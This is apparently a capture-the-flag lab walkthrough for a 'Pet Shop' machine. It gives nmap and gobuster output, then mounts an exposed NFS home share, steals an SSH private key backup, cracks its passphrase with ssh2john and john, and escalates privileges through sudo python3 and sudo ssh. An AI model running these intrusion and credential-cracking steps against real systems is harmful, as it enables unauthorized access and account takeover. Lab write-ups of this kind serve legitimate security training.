Nmap Scan Result:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Pet Shop
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 39983/tcp mountd
| 100005 1,2,3 49575/tcp6 mountd
| 100005 1,2,3 51054/udp6 mountd
| 100005 1,2,3 57330/udp mountd
| 100021 1,3,4 37321/udp6 nlockmgr
| 100021 1,3,4 41725/udp nlockmgr
| 100021 1,3,4 42639/tcp nlockmgr
| 100021 1,3,4 44645/tcp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
27853/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 97:93:e4:7f:41:79:9c:bd:3d:d8:90:c3:93:d5:53:9f (RSA)
| 256 11:66:e9:84:32:85:7b:c7:88:f3:19:97:74:1e:6c:29 (ECDSA)
|_ 256 cc:66:1e:1a:91:31:56:56:7c:e5:d3:46:5d:68:2a:b7 (ED25519)
33423/tcp open mountd 1-3 (RPC #100005)
39983/tcp open mountd 1-3 (RPC #100005)
42639/tcp open nlockmgr 1-4 (RPC #100021)
46811/tcp open mountd 1-3 (RPC #100005)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.46 seconds
gobuster result:
/images (Status: 301) [Size: 309] [--> http://172.31.1.7/images/] /css (Status: 301) [Size: 306] [--> http://172.31.1.7/css/]
/fonts (Status: 301) [Size: 308] [--> http://172.31.1.7/fonts/] /server-status (Status: 403) [Size: 275]
/server-status (Status: 403) [Size: 275]
ssh and ftp requires password so the key must be in the website?
Exploiting nfs:2049
distributed file system protocol, allowing a user on a client computer to access files over a computer network
Thhis command shows what ip can access what files.
In this case, any IP can mount the "amir" folder.
Mount the share:
mount - t nfs IP:/home/amir /mnt/Shares
Once we mount it, we can go to the directory and see all the files.
Now we see ssh backup file we can access, let's copy that over.
cp /mnt/Shares/.ssh/.idrs.bak .
chmod 700 id_rsa.bak to make it accessable.
ssh -i id_rsa.bak amir@172.31.1.7 -p 27853
-i to specify the private key file.
Enter passphrase for key 'id_rsa.bak':
now it's asking for a passphrase but we don't have it.
We can try to bruteforce it with ssh2john
locate ssh2john
/usr/share/john/ssh2john.py id_rsa.bak
id_rsa.bak:$sshng$1$16$8D55B7449F8965162DA3B7F2F017FC21$1200$da5235b60485eb5323160d84af6d865abf6122625bb99d35239e7ac85a0b006363ffde590761fc12bf6ef307cc82bf33b81f18bb0d8698ed23260b90e022b7ea40cb4ff8691b9016e567c7012cde3c7c79f0e97686b1fed9ee480282307159a26c5377cc86180b39e7e9b22f45aab092ec5a0f4d441bc20fc6002f9b436bdec3f9dfdc278299727fbffec6abcfc93d7c8d3d39f0510c3c599e6fe57430773394d58e5bac2b1a7c5001e6b638df88530892b135522efe102c655617c2dcb9a972b78fb82abe3b81d971461f4770d0f3b5f233b6298c746a7c01d579cf82832b22fa15455f999a82da7c616c550ab45ee4b2eeea1c6a55f69f4f920971fbfad4abd35e89f15c446ae1b0e59cb545e6589ec16e6aea160c35f97f2e8ba03fbadb4447c8446e5238a1b7df2e7183ac03b8c2e1feaad036a1e970c2397f271caac1b187e111805bfe00b1ea83cd0e91a5f8104aaf3004f6f930ca7664a133125f2a7167304b51421b3fd53c7a67118c1fa4595c275929aa4893e6098dac315ab8dd66ba97924bb4f98807871e6b246c725f34d48662349b4d1cc248596adaf08d5c6b5eee3b5adf860256e70d1c121447fdb218bae6dc299560fae3770d22af00edfae7a93df5324102e14aa89975bc868a58e551e8a3e7ecc96b1eed3a3941063052634acc470886f051831016d2983664df4a81dd06fd4d071aa9ef568bf96216ec55c9f6ee922196d9beb92466dded1d6a561ea92b0e07777e621a656c9267bb7afb12ba910c3aef5f2ac240908ad04f169da54f301b6c24a7435333b7e1ddabad4c318aa2b4573978fe715eb37a18d7518c944deb1330387d1145661ee8b1bc8157f15df0e7ad81576f26bab072b7b23eb9bbe66718ef879d67ce93896b883ad6d9e3ff83826e114210ae27b04c61d074b5d5678302fb9e0dab8b9365a08b0ff3ff2cacb2bb213e25defefc581852651de9720da512c2976b674006cf052eb4dd2b3ab877c92eb24c31f6ada2d26bbeb27b56f17beae1d90fe2121cea6b545b5ab83b7c0fb914944b01975895aaa512c56df359f0e267410a98c46d4975f5e805c48aa88020229455af9d94387f5d893e69349a47bce22770efaf927417a87f5f201a24779969f7232a052d169c32ce4de33acd0573860955735c2a28f3c8a8630d48f753b9edcd2f6f1f12e3449b21ebd4a6ba617f7553665cab471c36001fd1cdc9571cdfdf11ec2cb7699ac5ab83fb7d8aae6d6ebd3702364dc236b7bb3703dbead074ad8dd1dc4ee1d92fcc2add1879929b14598bc27a241eacd223cb88cbcc2b3e3e87f51fb0c53d3efca3f28b72fb2486cf6abb073b87e5071d6c3025258e548d5bfdc9d800cfed0280e40ca355cb086e9fda5f2789282b60951738625f261260aba1eeb5a420ced269dab56c4563dff3e95442eb5b233b84f5c5870615295579700db8df13611f26532bebb86f0ea0d43ae51be0c520913f315ee04026c665c8438a435b9f4b48eecf9cf763b0637c798ef14e71b9e74f4360ae85a140b44fc863a7fc11f6e70a0c3a90a17a5604cf5c33920f96d1bec0094fdfd11b18c8a79ea82a0dacd6024ff048aa3889e18b9d670d3917bb4e2dbdf6d2260b2d25f332562020db1fb6d2318c953e5581ae0501590eb1148e7988a7618e195075b959234e03a126ad84a15ef8a8636fc6e2
it returns a sshhash that we can crack with john
Let's output this file
❯ /usr/share/john/ssh2john.py id_rsa.bak > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Got the password!
Now we can try to ssh again and we get the access to amir
Privilege Escalation
sudo -l to see any permission
python3 is listed as sudo command
on GTFObins, we can see that we can run sudo command on it.
specify the user as "amy" and where the python script is and change the bin/sh to bin/bash
sudo -u amy /usr/bin/python3 -c 'import os; os.system("/bin/bash")'
Now we are on amy
if you do sudo -l again, it shows (ALL) NOPASSWD: /usr/bin/ssh
gtfo bin shows that the command will allow us to get a root shell!
